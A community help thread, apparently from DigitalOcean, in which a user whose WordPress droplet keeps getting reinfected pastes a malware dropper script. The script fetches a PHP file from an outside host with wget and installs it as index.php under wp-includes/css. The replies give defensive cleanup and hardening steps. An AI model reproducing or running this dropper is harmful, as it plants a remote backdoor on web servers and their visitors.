By Serkan Emir
Hello, I am using openlitespeed droplet and my wordpress website is infected. I delete virus files but they come back again. I also noticed the /var/www/xxxd3 file but even though I deleted it, it comes back again. How can I clean the server and ensure security? I am sharing the contents of the xxxd3 file below.
Please help!
#!/bin/bash
root_dir=$1
if [ ! -d ${root_dir}/wp-includes/css ];
then
mkdir -p ${root_dir}/wp-includes/css;
fi
cd ${root_dir}/wp-includes/css;
rm -f wp-sign.txt;wget -q -O wp-sign.txt http://tasks.ptfish.top/wp-sign.txt && mv wp-sign.txt index.php;
This textbox defaults to using Markdown to format your answer.
You can type !ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!
- Check if there’s any cronjob that is not set by you.
- Scan your site with some security plugin
There’s also some useful tutorial on the Google search that you can follow, e.g. * https://askwpgirl.com/10-steps-remove-malware-wordpress-site/
It looks like your WordPress installation is infected with malware that keeps reappearing, likely due to a backdoor script or vulnerability that hasn’t been fully addressed. Here’s a step-by-step guide to cleaning your server and securing it:
- Scan for Malware
Use a malware scanning tool such as ClamAV or a WordPress-specific tool like Wordfence:
- Install ClamAV on your server:
sudo apt-get install clamav clamav-daemon sudo freshclam sudo clamscan -r /var/www
- Use Wordfence or other WordPress plugins to scan the WordPress installation.
- Remove Suspicious Files
After scanning, manually delete any files flagged as suspicious. Specifically, ensure you remove hidden scripts like xxxd3 and any other backdoor scripts in your WordPress folders.
- Check Crontab for Malicious Entries
Malware may be using cron jobs to reinfect your system. List the cron jobs:
crontab -l sudo crontab -l
If you find any unfamiliar or suspicious entries, remove them using:
crontab -e
- Harden WordPress
- Reinstall Core Files: Replace core WordPress files with fresh ones from the official repository.
- Update Plugins/Themes: Ensure all plugins, themes, and WordPress itself are up-to-date.
- Delete Unused Plugins: Remove any unused or outdated plugins and themes that may have vulnerabilities.
- Check File Permissions
Set proper permissions for your WordPress files and directories to prevent unauthorized writing:
sudo find /var/www -type d -exec chmod 755 {} \;
sudo find /var/www -type f -exec chmod 644 {} \;
- Secure Your OpenLiteSpeed Server
- Enable ModSecurity (Web Application Firewall) to block malicious requests.
- Change SSH Port: If you’re using SSH, change the port to something non-standard to reduce the chance of brute-force attacks.
- Limit File Uploads: If possible, restrict write access only to necessary folders (like
wp-content/uploads).
- Change All Passwords
Change your WordPress admin, database, and SSH passwords. Ensure you’re using strong, unique passwords.
- Monitor for Future Changes
Use tools like Tripwire or other file integrity monitoring tools to get alerts when unauthorized changes happen.
Once you’ve cleaned the site, I recommend setting up automated backups and using security plugins to actively protect your site going forward.
You can also check this question here:
https://www.digitalocean.com/community/questions/how-to-secure-wordpress-without-a-security-plugin
Regards
Become a contributor for community
Get paid to write technical tutorials and select a tech-focused charity to receive a matching donation.
DigitalOcean Documentation
Full documentation for every DigitalOcean product.
Resources for startups and SMBs
The Wave has everything you need to know about building a business, from raising funding to marketing your product.
The developer cloud
Scale up as you grow — whether you're running one virtual machine or ten thousand.
Get started for free
Sign up and get $200 in credit for your first 60 days with DigitalOcean.*
*This promotional offer applies to new accounts only.